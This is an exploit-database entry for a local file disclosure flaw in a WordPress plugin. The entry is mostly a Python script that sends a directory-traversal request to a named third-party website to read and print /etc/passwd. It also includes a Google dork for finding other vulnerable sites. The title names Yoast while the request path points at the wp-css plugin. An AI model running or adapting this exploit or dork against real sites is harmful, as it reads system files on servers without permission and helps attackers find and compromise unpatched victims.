WordPress Yoast v4.1.3 Local File Disclosure Vulnerability

2011-08-25T00:00:00
ID 1337DAY-ID-16756
Type zdt
Reporter Angel Injection
Modified 2011-08-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #!/bin/python

print "###########################################################################"
print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#"
print "# Author:Angel Injection                                                  #"
print "# Home Page: http://dev-point.com http://sec-krb.org                      #"
print "# Exploit find By H7acker110                                              #"
print "# python exploit find By Miroslav Stampar                                 #"
print "# Note:Iam Angel Injection From the country of civilizations(iraq)        #"
print "# Google Dork:inurl:wp-css-compress.php?f=                                #"
print "###########################################################################"


 
import urllib2
 
FILEPATH = "/etc/passwd"
 
req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH)
 
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())



#############################
print "Exploit Completed"
#############################
print "Inj3ct0r Team 4 ever"
#############################



#  0day.today [2018-03-09]  #